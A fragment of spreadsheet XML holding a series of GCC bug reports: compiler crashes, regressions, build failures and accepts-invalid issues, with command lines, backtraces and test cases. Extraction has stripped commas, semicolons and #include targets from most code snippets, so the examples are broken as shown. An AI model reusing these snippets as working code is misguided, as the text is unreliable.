    <t>[4.5 regression] ICE building stage 1 libgcc: SEGV in compare_access_positions</t>
  </si>
  <si>
    <t>While building current mainline (rev 154216) again after half a year the bootstrap
aborted while building the stage 1 libgcc:
/vol/gcc/src/gcc-dist/libgcc/../gcc/libgcc2.c: In function '__muldi3':
/vol/gcc/src/gcc-dist/libgcc/../gcc/libgcc2.c:562:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [_muldi3.o] Error 1
Running cc1 under gdb reveals
(gdb) run -fpreprocessed libgcc2.i -quiet -dumpbase libgcc2.c -mno-synci -auxbase-strip _muldi3.o -g -g -g -O2 -O2 -O2 -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -version -o libgcc2.s
Starting program: /tmp_mnt/vol/gcc/obj/gcc-4.5.0-20091116/5.3-gcc/mips-sgi-irix5.3/libgcc/cc1 -fpreprocessed libgcc2.i -quiet -dumpbase libgcc2.c -mno-synci -auxbase-strip _muldi3.o -g -g -g -O2 -O2 -O2 -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -version -o libgcc2.s
GNU C (GCC) version 4.5.0 20091116 (experimental) [trunk revision 154216] (mips-sgi-irix5.3)
	compiled by GNU C version 4.1.1 GMP version 4.2.1 MPFR version 2.3.2 MPC version 0.8
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (GCC) version 4.5.0 20091116 (experimental) [trunk revision 154216] (mips-sgi-irix5.3)
	compiled by GNU C version 4.1.1 GMP version 4.2.1 MPFR version 2.3.2 MPC version 0.8
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 23aff50e67c559603acf00c443e2c073
Program received signal SIGSEGV Segmentation fault.
0x014a2e48 in compare_access_positions (a=0x10292084 b=0x1029208c)
    at /vol/gcc/src/gcc-dist/gcc/tree-sra.c:1106
(gdb) p f1
$1 = (const access_p) 0x20
(gdb) p f2
$2 = (const access_p) 0x10291d80
(gdb) where
#0  0x014a2e48 in compare_access_positions (a=0x10292084 b=0x1029208c)
    at /vol/gcc/src/gcc-dist/gcc/tree-sra.c:1106
#1  0x0fac4254 in qsort () at qsort.c:94
#2  0x014a610c in sort_and_splice_var_accesses (var=0x1a98b40)
    at /vol/gcc/src/gcc-dist/gcc/tree-sra.c:1407
#3  0x014a9050 in analyze_all_variable_accesses ()
    at /vol/gcc/src/gcc-dist/gcc/tree-sra.c:1875
#4  0x014ad7dc in perform_intra_sra ()
    at /vol/gcc/src/gcc-dist/gcc/tree-sra.c:2568
#5  0x014ada50 in early_intra_sra ()
    at /vol/gcc/src/gcc-dist/gcc/tree-sra.c:2597
#6  0x00d17cec in execute_one_pass (pass=0x10180324)
    at /vol/gcc/src/gcc-dist/gcc/passes.c:1522
#7  0x00d1853c in execute_pass_list (pass=0x10180324)
    at /vol/gcc/src/gcc-dist/gcc/passes.c:1577
#8  0x00d18584 in execute_pass_list (pass=0x1017fe38)
    at /vol/gcc/src/gcc-dist/gcc/passes.c:1578
#9  0x00d16064 in do_per_function_toporder (
    callback=0xd184a4  data=0x1018cb48)
    at /vol/gcc/src/gcc-dist/gcc/passes.c:1120
#10 0x00d19254 in execute_ipa_pass_list (pass=0x1017fe04)
    at /vol/gcc/src/gcc-dist/gcc/passes.c:1743
#11 0x011d6504 in ipa_passes () at /vol/gcc/src/gcc-dist/gcc/cgraphunit.c:1363
#12 0x011d6884 in cgraph_optimize ()
    at /vol/gcc/src/gcc-dist/gcc/cgraphunit.c:1422
#13 0x011d5330 in cgraph_finalize_compilation_unit ()
    at /vol/gcc/src/gcc-dist/gcc/cgraphunit.c:1090
#14 0x004c60a4 in c_write_global_declarations ()
    at /vol/gcc/src/gcc-dist/gcc/c-decl.c:9489
#15 0x00626034 in compile_file () at /vol/gcc/src/gcc-dist/gcc/toplev.c:1061
#16 0x0062ac60 in do_compile () at /vol/gcc/src/gcc-dist/gcc/toplev.c:2408
#17 0x0062ae8c in toplev_main (argc=25 argv=0x7ffbfeb4)
    at /vol/gcc/src/gcc-dist/gcc/toplev.c:2450
#18 0x00601160 in main (argc=25 argv=0x7ffbfeb4)
    at /vol/gcc/src/gcc-dist/gcc/main.c:35
So far I couldn't reproduce this in an i386-pc-solaris2.10 -&gt; mips-sgi-irix5.3
cross compiler.</t>
  </si>
  <si>
    <t>GCC-23442</t>
  </si>
  <si>
    <t>Compiler fails to build - internal compiler error: in do_SUBST at combine.c:462</t>
  </si>
  <si>
    <t>Attempting to build a cross-compiler for m68k-unknown-elf on x86_64-linux-gnu
fails with an internal error:
/home/hamish/projects/rockbox/gcc-4/orig/build/gcc/xgcc
-B/home/hamish/projects/rockbox/gcc-4/orig/build/gcc/
-B/home/hamish/m68k-amd64/m68k-elf/bin/ -B/home/hamish/m68k-amd64/m68k-elf/lib/
-isystem /home/hamish/m68k-amd64/m68k-elf/include -isystem
/home/hamish/m68k-amd64/m68k-elf/sys-include -O2  -DIN_GCC -DCROSS_COMPILE   -W
-Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-Wold-style-definition  -isystem ./include   -g  -DIN_LIBGCC2
-D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -I../../gcc-4.0.1/gcc
-I../../gcc-4.0.1/gcc/. -I../../gcc-4.0.1/gcc/../include
-I../../gcc-4.0.1/gcc/../libcpp/include  -m68000 -DL_fixdfdi -c
../../gcc-4.0.1/gcc/libgcc2.c -o libgcc/m68000/_fixdfdi.o
../../gcc-4.0.1/gcc/libgcc2.c: In function '__fixdfdi':
../../gcc-4.0.1/gcc/libgcc2.c:1256: internal compiler error: in do_SUBST at
combine.c:462
The host compiler is
gcc version 4.0.2 20050806 (prerelease) (Debian 4.0.1-4)
The same internal error occurs trying to build gcc-3.4.4
using either gcc-4.0.2 or gcc-3.4.4.
The configure command was
../gcc-4.0.1/configure --prefix=$HOME/m68k-amd64 --target=m68k-unknown-elf
--enable-languages=c
Google found someone else had this problem with a sparc64 host:
http://www.rtems.com/ml/rtems-users/2005/june/msg00025.html
And someone else had this problem on x86_64 with gcc-3.4:
http://mailman.uclinux.org/pipermail/uclinux-dev/2005-June/033210.html
Hamish</t>
  </si>
  <si>
    <t>hamish</t>
  </si>
  <si>
    <t>GCC-44572</t>
  </si>
  <si>
    <t>[4.6 Regression] dwarf2out.c:22403:1: error: (near initialization for 'dwarf2_debug</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./prev-gcc/xgcc -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/g
nu/gcc/gcc-4.6.0/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.6.0/hppa2.0w-hp
-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.6.0/hppa2.0w-hp-hpux11.11/lib/ -isystem /op
t/gnu/gcc/gcc-4.6.0/hppa2.0w-hp-hpux11.11/include -isystem /opt/gnu/gcc/gcc-4.6.
0/hppa2.0w-hp-hpux11.11/sys-include    -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-s
trings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-att
ribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -We
rror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I
../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../li
bcpp/include -I/opt/gnu/gcc/gcc-4.6.0/include  -I../../gcc/gcc/../libdecnumber -
I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber     ../../gcc/gcc/dwarf2out
.c -o dwarf2out.o
../../gcc/gcc/dwarf2out.c:22403:1: error: missing initializer [-Werror=missing-f
ield-initializers]
../../gcc/gcc/dwarf2out.c:22403:1: error: (near initialization for 'dwarf2_debug
_hooks.start_end_main_source_file') [-Werror=missing-field-initializers]
cc1: all warnings being treated as errors</t>
  </si>
  <si>
    <t>GCC-15740</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE caused by a memory operand in an asm statement</t>
  </si>
  <si>
    <t>The following code compiled with -O (or greater) causes ICE: 
void foo(void) 
{ 
	int a b 
	a = 1 
	b = a + 1 
	asm (nop : : m (a)) 
} 
This is with the snapshot gcc-3.5-20040530.</t>
  </si>
  <si>
    <t>l_belev</t>
  </si>
  <si>
    <t>GCC-56424</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE at tree-inline.c:2833 on a-nllcef.ads at -O2</t>
  </si>
  <si>
    <t>Native bootstrap on x86_64-w64-mingw32 fails in stage3.
/SCRATCH/tmp.WFOaDArHyR/gcc-4.8.0/gcc-4.8.0/./gcc/xgcc -B/SCRATCH/tmp.WFOaDArHyR/gcc-4.8.0/gcc-4.8.0/./gcc/ -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/lib -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/include -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/bin/ -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib/ -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/sys-include    -c -g -O2    -W -Wall -gnatpg -nostdinc   a-nllcef.ads -o a-nllcef.o
in declare_return_variable at tree-inline.c:2833make[6]: *** [a-nllcef.o] Error 1 
caused by the fixes for PR55797 revison 195750 195751.</t>
  </si>
  <si>
    <t>GCC-25860</t>
  </si>
  <si>
    <t>[4.2 Regression] ice with -g -O2 -fPIC</t>
  </si>
  <si>
    <t>I just tried to compile package gammu-1.04.0-2 from Suse Linux with a recent
GNU C compiler version 4.2 snapshot 20060114. 
The compiler snapshot said
Making common/service/backup/gsmback.c
common/service/gsmring.c: In function savewav:
common/service/gsmring.c:93: internal compiler error: in add_stmt_operand at tree-ssa-operands.c:1563
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. It needs -g -O2 -fPIC on a x86_64 box.</t>
  </si>
  <si>
    <t>GCC-6403</t>
  </si>
  <si>
    <t>assignment of int to string is not detected</t>
  </si>
  <si>
    <t>An assignment of an integer value to a string variable
is not detected.
Release:
gcc 3.0.4
Environment:
Linux
How-To-Repeat:
#include 
#include 
int main() {
  int i = 6
  std::string s
  s = i
  std::cout &lt;&lt; s &lt;&lt; \n
}
compiles without error messages</t>
  </si>
  <si>
    <t>o.kullmann</t>
  </si>
  <si>
    <t>GCC-28961</t>
  </si>
  <si>
    <t>Macro definitions needed by gcc/gthr.h are missing from libstdc++ build</t>
  </si>
  <si>
    <t>When attempting to build an armeb-linux cross compiler on a RH Enterprise Linux 3.0 system libstdc++ is not being built in a thread-safe manner.  Here is the configure command line:
configure --cache-file=./config.cache --host=armeb-linux --build=i686-pc-linux-gnu --enable-multilib --with-cross-host=i686-pc-linux-gnu --prefix= --with-local-prefix= --with-headers= --with-libs= --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-__cxa_atexit --enable-languages=cc++ --enable-shared --enable-long-long --with-cpu=arm9tdmi --enable-cxx-flags=-mcpu=arm9tdmi --with-float=soft --with-gcc-version-trigger= --program-transform-name=s^armeb-linux-  --srcdir=../../../../gcc-3.4.3/libstdc++-v3 --with-target-subdir=armeb-linux
--enable-threads=posix is passed in and looking at config.log I see that it's appearing to be honored correctly since glibcxx_thread_h is being set to gthr-posix.h.  When I go into the build target directory (/armeb-linux/libstdc++-v3/include/bits) I can see that gthr-default.h is indeed copied from gthr-posix.h  Thus it would appeard that gthr-default.h is correct.  With that said the real problem appears to be in the use of gthr.h (which originates from /armeb-linux/libstdc++-v3/include/armeb-linus/bits/gthr.h which is copied from /gcc/gthr.h).
In gthr.h there is a list of conditional includes:
/* Check first for thread specific defines.  */
#if _GLIBCXX__PTHREADS
#include 
#elif _GLIBCXX__DCE_THREADS
#include 
#elif _GLIBCXX__SOLARIS_THREADS
#include 
/* Include GTHREAD_FILE if one is defined.  */
#elif defined(_GLIBCXX_HAVE_GTHR_DEFAULT)
#if __GXX_WEAK__
#ifndef _GLIBCXX_GTHREAD_USE_WEAK
#define _GLIBCXX_GTHREAD_USE_WEAK 1
#endif
#endif
#include 
/* Fallback to single thread definitions.  */
#else
#include 
#endif
I would expect on my system to either have -D_GLIBCXX__PTHREADS or -D_GLIBCXX_HAVE_GTHR_DEFAULT.  I see neither.  I do see _GLIBCXX_HAVE_GTHR_DEFAULT defined in c++config.h though.  Unfortunately gthr.h does not include c++config.h so it does now see that there is a gthr-default.h header available to include.  The result is that files that include gthr.h are not guaranteed to pull in the proper thread support routines.  I first ran into this problem with the file atomicity.cc (/armeb-linux/libstdc++-v3/src/atomicity.cc).  This file contains a couple of default atomic oparerations: __exchange_and_add and __atomic_add:
#include 
#include 
namespace __gnu_internal
{
  __glibcxx_mutex_define_initialized(atomic_mutex)
} // namespace __gnu_internal
namespace __gnu_cxx
{
  _Atomic_word
  __attribute__ ((__unused__))
  __exchange_and_add(volatile _Atomic_word* __mem int __val)
  {
    __glibcxx_mutex_lock(__gnu_internal::atomic_mutex)
    _Atomic_word __result
    __result = *__mem
    *__mem += __val
    __glibcxx_mutex_unlock(__gnu_internal::atomic_mutex)
    return __result
  }
  void
  __attribute__ ((__unused__))
  __atomic_add(volatile _Atomic_word* __mem int __val)
  { __exchange_and_add(__mem __val) }
} // namespace __gnu_cxx
The exchange and add routine is absurdly simple in that it creates a critical section around the add to ensure that it's an atomic operation.  In theory the include of bits/concurrence.h should pull in the definitions of __glibcxx_mutex_lock and __glibcxx_mutex_unlock.  This is unforutanately not the case.  The file /armeb-linux/libstdc++-v3/include/bits/concurrence.h includes bits/gthr.h.  But... c++config.h is not included anywhere.  Also the compile line for atomicity.cc does not have any of the necessary gthr.h macros defined either:
/gcc/xgcc -shared-libgcc -B/gcc/ -nostdinc++ -L/armeb-linux/libstdc++-v3/src -L/armeb-linux/libstdc++-v3/src/.libs -B/armeb-linux/armeb-linux/bin/ -B/armeb-linux/armeb-linux/lib/ -isystem /armeb-linux/armeb-linux/include -isystem /armeb-linux/armeb-linux/sys-include -I/armeb-linux/libstdc++-v3/include/armeb-linux -I/armeb-linux/libstdc++-v3/include -I/libstdc++-v3/libsupc++ -O2 -g -O2 -g -O2 -D_GNU_SOURCE -fno-implicit-templates -Wall -W -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -mcpu=arm9tdmi -c atomicity.cc -o atomicity.o
The result of this is that atomicity.o is built without any thread safety.  This means that operations such as the reference count inrement and decrement in std::string are not safe.
Thanks
-Seth Moore</t>
  </si>
  <si>
    <t>sethmoore</t>
  </si>
  <si>
    <t>GCC-55758</t>
  </si>
  <si>
    <t>LOGICAL and BIND(C): Reject kind=2/4/8/16 with -std=f2008 improve warning switch to nonBOOLEAN_TYPE for those</t>
  </si>
  <si>
    <t>See http://gcc.gnu.org/ml/fortran/2012-12/threads.html#00135
In the Fortran standard only LOGICALs of kind C_BOOL interoperate with C namely with C99's _Bool/bool.
In C also integers - in particular int - are used in Boolean expressions allows for the whole range of integral values - all are true except for 0 which is false.
gcc's _Bool and gfortran's LOGICAL all assume a binary state (BOOLEAN_TYPE) which is either 0 or 1 such that .NOT. can be implemented by flipping a single bit.
Hence regarding an int as BOOLEAN_TYPE leads to .NOT.(-1) = -2.
Currently LOGICAL(kind=C_INT) (c_int == 4) is accepted by gfortran and C binding but it might lead to wrong results with .NOT.
Expected:
* With -std=f95/f2003/f2008/f2008tr only LOGICAL with kind=C_BOOL (C_BOOL == 1) is accepted
* With -std=gnu also the others (24816) are accepted but a warning is printed for them.
* Consider replacing internally BOOLEAN_TYPE by a signed-integer type LOGICAL with kind /= C_BOOL in procedures with C binding</t>
  </si>
  <si>
    <t>GCC-24348</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] bootstrap failure building libgcc</t>
  </si>
  <si>
    <t>building a CVS 20051008 cross compiler built with 20051008 native compiler
  Matthias
/scratch/packages/gcc/snap/gcc-snapshot-20051008/build-hppa64/./gcc/xgcc -B/scratch/packages/gcc/snap/gcc-snapshot-20051008/build-hppa64/./gcc/ -B/usr/lib/gcc-snapshot/hppa64-linux-gnu/bin/ -B/usr/lib/gcc-snapshot/hppa64-linux-gnu/lib/ -isystem /usr/lib/gcc-snapshot/hppa64-linux-gnu/include -isystem /usr/lib/gcc-snapshot/hppa64-linux-gnu/sys-include -O2  -O2 -g -O2  -DIN_GCC -DCROSS_COMPILE   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -Dpa64=1 -DELF=1 -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/../include -I../../src/gcc/../libcpp/include  -DL_muldi3 -c ../../src/gcc/libgcc2.c -o libgcc/./_muldi3.o../../src/gcc/libgcc2.c: In function '__muldi3':
../../src/gcc/libgcc2.c:520: internal compiler error: in eliminate_reg_to_offset at dwarf2out.c:8604
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [libgcc/./_muldi3.o] Error 1</t>
  </si>
  <si>
    <t>GCC-52564</t>
  </si>
  <si>
    <t>Accepts invalid: Missing I/O list after comma</t>
  </si>
  <si>
    <t>In the following test case gfortran does not diagnose the missing I/O list after the comma in the print statement:
program printbug
  print * 'hello world'
! the following line should not compile:
  print *
end program
Other compilers do diagnose it.
First noticed on 4.6.1 but is also a problem with 4.8 snapshot.</t>
  </si>
  <si>
    <t>w6ws</t>
  </si>
  <si>
    <t>GCC-57104</t>
  </si>
  <si>
    <t>ICE: in expand_expr_addr_expr_1 at expr.c:7594 with -fsanitize=thread and hardreg variable</t>
  </si>
  <si>
    <t>Created attachment 29965
reduced testcase
Compiler output:
$ gcc -fsanitize=thread testcase.c 
testcase.c: In function 'foo':
testcase.c:6:12: internal compiler error: in expand_expr_addr_expr_1 at expr.c:7594
     data_0 + data_3
            ^
0x79a535 expand_expr_addr_expr_1
        /mnt/svn/gcc-trunk/gcc/expr.c:7594
0x78cbe9 expand_expr_addr_expr
        /mnt/svn/gcc-trunk/gcc/expr.c:7703
0x78cbe9 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        /mnt/svn/gcc-trunk/gcc/expr.c:10436
0x6877cd expand_normal
        /mnt/svn/gcc-trunk/gcc/expr.h:450
0x6877cd precompute_register_parameters
        /mnt/svn/gcc-trunk/gcc/calls.c:821
0x6877cd expand_call(tree_node* rtx_def* int)
        /mnt/svn/gcc-trunk/gcc/calls.c:3013
0x66c364 expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
        /mnt/svn/gcc-trunk/gcc/builtins.c:6868
0x78b097 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        /mnt/svn/gcc-trunk/gcc/expr.c:10207
0x69c9a5 expand_call_stmt
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2119
0x69c9a5 expand_gimple_stmt_1
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2157
0x69c9a5 expand_gimple_stmt
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2309
0x69d74d expand_gimple_basic_block
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4143
0x69f7bc gimple_expand_cfg
        /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4662
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                           
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-198366-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-198366-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20130428 (experimental) (GCC) 
Tested revisions:
r198366 - crash
4.8 r198018 - crash</t>
  </si>
  <si>
    <t>GCC-6624</t>
  </si>
  <si>
    <t>[x86]SSE mis-alignment with -O0</t>
  </si>
  <si>
    <t xml:space="preserve">    The SSE intrinsic _mm_loadu_ps can do an aligned SSE load (LOADAPS) from
    an unaligned address when compiling with -O0. The problem seems to go away
    with -O1 and higher. This causes a segfault when the program is run. The
    assembly generated looks like:
        call   804834a 
        add    $0x10%esp
        movaps %xmm00xffffffe8(%ebp)
    On my machine the movaps address is consistently not on a 16-byte
    boundary like it should be.
Release:
3.1 20020426 (prerelease)
Environment:
System: Linux espresso 2.4.18-xfs #1 SMP Tue Mar 12 20:03:55 CST 2002 i686 unknown
Architecture: i686 (more precisely dual AthlonMP)
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr/lib/gcc-snapshot --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
    This simple program exhibits the problem on my machine:
    #include 
    int main(int argc char** argv) {
        __m128 x
        float a[4] = {1.0f 1.0f 1.0f 1.0f}
        x = _mm_loadu_ps(a)
        return 0
    }
    Compiled with gcc -g -O0 -msse foo.c -o foo.</t>
  </si>
  <si>
    <t>jdhall</t>
  </si>
  <si>
    <t>GCC-5650</t>
  </si>
  <si>
    <t>g++ allows uninitialized const members</t>
  </si>
  <si>
    <t>Given:
	struct S {
		S() { }
		int const i
	}
	main() {
		S s
	}
g++ accepts allows S::i to go uninitialized.
Release:
3.0.3
Environment:
System: Linux powerbook 2.2.19-pjl #1 Sun Sep 2 04:31:35 PDT 2001 ppc unknown
Architecture: ppc
host: powerpc-unknown-linux-gnu
build: powerpc-unknown-linux-gnu
target: powerpc-unknown-linux-gnu
configured with: /tmp/gcc-3.0.3/configure --prefix=/usr/local/packages/gcc-3.0.3 --enable-threads=posix --enable-languages=cc++ --disable-nls
How-To-Repeat:
Compile the above.</t>
  </si>
  <si>
    <t>pauljlucas</t>
  </si>
  <si>
    <t>GCC-46336</t>
  </si>
  <si>
    <t>[C++0X] ICE on invalid: in register_constexpr_fundef at cp/semantics.c:5571</t>
  </si>
  <si>
    <t>This is an ICE on invalid code that I hit while trying to reduce an example for a more important bug.
extern C {
  enum A { }
  inline constexpr A
  f(A a A b)
  { return A(static_cast(a)  }
  enum B { }
  inline constexpr B
  f(B a B b)
  { return B(static_cast(a)  }
}
4.cc: In function â€˜constexpr B f(B B)â€™:
4.cc:8:13: error: declaration of C function â€˜constexpr B f(B B)â€™ conflicts with
4.cc:4:3: error: previous declaration â€˜constexpr A f(A A)â€™ here
4.cc: In function â€˜constexpr B f(B B)â€™:
4.cc:9:58: internal compiler error: in register_constexpr_fundef at cp/semantics.c:5571</t>
  </si>
  <si>
    <t>GCC-9169</t>
  </si>
  <si>
    <t>filebuf output fails if codecvt::out returns noconv</t>
  </si>
  <si>
    <t>If a codecvt facet that returns false from always_noconv() but returns noconv from out() is installed in a filebuf no output is produced.
Release:
gcc-3.2.1
Environment:
Red Hat Linux 8.0
How-To-Repeat:
See attachment.</t>
  </si>
  <si>
    <t>GCC-33818</t>
  </si>
  <si>
    <t>[4.3 Regression]  Bogus error Variable 'str' is used at (1) before the ENTRY statement</t>
  </si>
  <si>
    <t>Reduced from http://gcc.gnu.org/ml/fortran/2007-10/msg00280.html
The following gives the bogus error:
  write(lu'(a)') 'UNIT '//UpperCase(UNAME(1))
                                             1
Error: Variable 'str' is used at (1) before the ENTRY statement in which it is a parameter
subroutine ExportZMX(lu)
  implicit real(selected_real_kind(15)) (a-ho-z)
  character(*)parameter :: UNAME(1:1)=(/'XXX'/)
  write(lu'(a)') 'UNIT '//UpperCase(UNAME(1))
  entry ExportSEQ(lu)
contains
  function UpperCase(str) result(res)
    character(*)intent(in) :: str
    character(len(str)) res
    res=str
  end function
end</t>
  </si>
  <si>
    <t>GCC-14340</t>
  </si>
  <si>
    <t>libstdc++ Debug mode: failure to convert iterator to const_iterator</t>
  </si>
  <si>
    <t>#include 
std::vector::const_iterator find_arc()
{
	std::vector v
	std::vector::const_iterator it = v.begin()
	std::vector::const_iterator end = v.end()
	return it == end ? v.end() : it
}
g++ -D_GLIBCXX_DEBUG -c debug-mode-1.cpp
debug-mode-1.cpp: In function
`__gnu_debug::_Safe_iterator&lt;__gnu_cxx::__normal_iterator&lt;const int*
__gnu_norm::vector &gt; &gt; __gnu_debug_def::vector&lt;int
std::allocator &gt; &gt; find_arc()':
debug-mode-1.cpp:10: error: operands to ?: have different types
the type are vector::iterator and vector::const_iterator but
a conversion should occur imho.
regards
Phil</t>
  </si>
  <si>
    <t>phil.el</t>
  </si>
  <si>
    <t>GCC-59334</t>
  </si>
  <si>
    <t>[4.9 Regression] r205486 caused many failures</t>
  </si>
  <si>
    <t>On Linux/x86 r205486 caused:
FAIL: 22_locale/locale/cons/12438.cc execution test
FAIL: gcc.dg/tree-ssa/alias-25.c scan-tree-dump-not optimized = 42
FAIL: g++.dg/asan/deep-stack-uaf-1.C  -O1  output pattern test is  should match ERROR: AddressSanitizer:? heap-use-after-free on address.*(
FAIL: g++.dg/asan/deep-stack-uaf-1.C  -O2  output pattern test is  should match ERROR: AddressSanitizer:? heap-use-after-free on address.*(
FAIL: g++.dg/asan/deep-stack-uaf-1.C  -O3 -fomit-frame-pointer  output pattern test is  should match ERROR: AddressSanitizer:? heap-use-after-free on address.*(
FAIL: g++.dg/asan/deep-stack-uaf-1.C  -O3 -g  output pattern test is  should match ERROR: AddressSanitizer:? heap-use-after-free on address.*(
FAIL: g++.dg/asan/deep-stack-uaf-1.C  -Os  output pattern test is  should match ERROR: AddressSanitizer:? heap-use-after-free on address.*(
FAIL: gfortran.dg/array_constructor_33.f90  -O  (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-27709</t>
  </si>
  <si>
    <t>Using size of array pointer component as dimension of function result causes gfortran internal error.</t>
  </si>
  <si>
    <t>The code below causes gfortran to internal error when compiled as follows:
gfortran -c Elements.F90
gfortran -c Global_Numbering.F90
 In file Global_Numbering.F90:9
end module global_numbering
                          1
 Internal Error at (1):
 find_array_spec(): Component not found
This is similar to bug #18568 but differs in that this bug is only exhibited when the size is used in the dimension statement. Calling size in normal code does not cause the problem. I have compiled the test case from #18568 with the same compiler and no error resulted.
The gfortran is compiled from SVN and has the following version string:
&gt; gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc/configure --enable-languages=cc++fortran : (reconfigured) ../gcc/configure
Thread model: posix
gcc version 4.2.0 20060519 (experimental)
The code is as follows:
module elements
  implicit none
  type element_type
     type(ele_numbering_type) pointer :: numbering
  end type element_type
  type ele_numbering_type
     integer dimension(::) pointer :: number2count
  end type ele_numbering_type
contains
  function element_local_coords(element) result (coords)
    type(element_type) intent(in) :: element    
    ! The following line is the problem
    real dimension(size(element%numbering%number2count 1)) :: coords
    coords=0.0 
  end function element_local_coords
end module elements
module global_numbering
  use elements
  implicit none
end module global_numbering</t>
  </si>
  <si>
    <t>David</t>
  </si>
  <si>
    <t>GCC-7</t>
  </si>
  <si>
    <t>[bad code] virtual base classes and exceptions</t>
  </si>
  <si>
    <t>[From ]
The following code aborts on the assertion with gcc 2.95.1 and 2.96
20000214 but NOT with egcs 1.1.2:
#include 
#include 
#include 
struct MyException : virtual public exception
{
  int value
  MyException(int v) : value(v) {}
  ~MyException() {assert(value == 10)}
}
int main() {
   try {
     throw MyException(10)
   } catch (exception &amp; e) {
     cerr &lt;&lt; e.what() &lt;&lt; endl
   }
}
It will not abort if when the base class is non virtual or 
   } catch (exception &amp; e) {
is changed to
   } catch (MyException &amp; e) {
This creates a problem with my aspell package
(http://aspell.sourceforge.net) as the exception heritage
used virtual base classes.  If you want to see the bug in action try
installing aspell compiled with the gcc 2.95.1 and type in this
  src/aspell -a --master=dkl
And you will get something like this.
Sorry I can't read the file /usr/local/lib/aspell/dkl.
I get this problem on intel-linux sparc-solaris and dec-alpha.
I forgot to say that there is a core dump after it outputs
Sorry I can't read the file /usr/local/lib/aspell/dkl.
With egcs 1.1.2 there is no core dump.  The core dump I have determined is
due to the string attempting to free garbage.
Release:
gcc-2.95.2
Environment:
System: Linux mira 2.3.48 #4 Sun Feb 27 23:26:02 CET 2000 i586 unknown
Architecture: i586
How-To-Repeat:
